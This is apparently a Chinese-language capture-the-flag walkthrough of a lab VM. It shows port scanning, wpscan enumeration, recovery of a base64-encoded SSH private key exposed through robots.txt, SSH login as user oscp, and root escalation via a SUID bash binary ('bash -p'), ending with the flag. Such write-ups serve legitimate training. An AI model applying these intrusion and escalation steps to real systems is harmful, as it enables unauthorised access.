本文內(nèi)容純屬虛構(gòu)，B站攻略鴨求關(guān)注點(diǎn)贊支持！

測試機(jī)IP地址：192.168.31.176

外部信息收集

端口掃描

22/tcp ? ?open ?ssh ? ? syn-ack ttl 64 OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp ? ?open ?http ? ?syn-ack ttl 64 Apache httpd 2.4.41 ((Ubuntu))
33060/tcp open ?socks5 ?syn-ack ttl 64

wordpress5.4.2博客內(nèi)容

XYZ Doohickey Company
a bike messenger
dog named Jack
live in Los Angeles
like pi?a coladas
user：oscp
有發(fā)表博客回復(fù)功能
搜索功能http://192.168.31.176/?s=
登錄頁面http://192.168.31.176/wp-login.php

wpscan --url http://192.168.31.176/ --enumerate vt,vp,u

Apache/2.4.41 (Ubuntu)

已知用戶admin

robots.txt

http://192.168.31.176/robots.txt

Disallow: /secret.txt

/secret.txt

LS0tLS1CRUdJTiBPUEVOU1NIIFBSSVZBVEUgS0VZLS0tLS0KYjNCbGJuTnphQzFyWlhrdGRqRUFB
QUFBQkc1dmJtVUFBQUFFYm05dVpRQUFBQUFBQUFBQkFBQUJsd0FBQUFkemMyZ3RjbgpOaEFBQUFB
xxx省略xxx
RHBlZVN6b3BTanlLaDEwYk53UlMwREFJTHNjV2c2eGMvUjh5dWVBZUkKUmN3ODV1ZGtoTlZXcGVy
ZzRPc2lGWk1wd0txY01sdDhpNmxWbW9VQmpSdEJENGc1TVlXUkFOTzBOajlWV01UYlc5UkxpUgpr
dW9SaVNoaDZ1Q2pHQ0NIL1dmd0NvZjllbkNlajRIRWo1RVBqOG5aMGNNTnZvQVJxN1ZuQ05HVFBh
bWNYQnJmSXd4Y1ZUCjhuZksyb0RjNkxmckRtalFBQUFBbHZjMk53UUc5elkzQT0KLS0tLS1FTkQg
T1BFTlNTSCBQUklWQVRFIEtFWS0tLS0tCg==

Base64解碼

$ base64 -d test.txt > test2.txt

得到

-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
NhAAAAAwEAAQAAAYEAtHCsSzHtUF8K8tiOqECQYLrKKrCRsbvq6iIG7R9g0WPv9w+gkUWe
xxx省略xxx
Rcw85udkhNVWperg4OsiFZMpwKqcMlt8i6lVmoUBjRtBD4g5MYWRANO0Nj9VWMTbW9RLiR
kuoRiShh6uCjGCCH/WfwCof9enCej4HEj5EPj8nZ0cMNvoARq7VnCNGTPamcXBrfIwxcVT
8nfK2oDc6LfrDmjQAAAAlvc2NwQG9zY3A=
-----END OPENSSH PRIVATE KEY-----

是OpenSSH私鑰

利用OpenSSH私鑰連接

mv test2.txt id_rsa sudo ssh -i id_rsa oscp@192.168.31.176 yes -bash-5.0$ id uid=1000(oscp) gid=1000(oscp) groups=1000(oscp),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lxd)

權(quán)限提升

本地信息收集

find / -perm -u=s -type f 2>/dev/null /usr/bin/gpasswd /usr/bin/mount /usr/bin/fusermount /usr/bin/passwd /usr/bin/newgrp /usr/bin/at /usr/bin/sudo /usr/bin/chfn /usr/bin/bash /usr/bin/pkexec /usr/bin/umount /usr/bin/chsh /usr/bin/su

使用bash命令進(jìn)行SUID提權(quán)

bash-5.0$ /usr/bin/bash -p bash-5.0# id uid=1000(oscp) gid=1000(oscp) euid=0(root) egid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lxd),1000(oscp)

其他

flag

cat flag.txt
d73b04b0e696b0945283defa3eee4538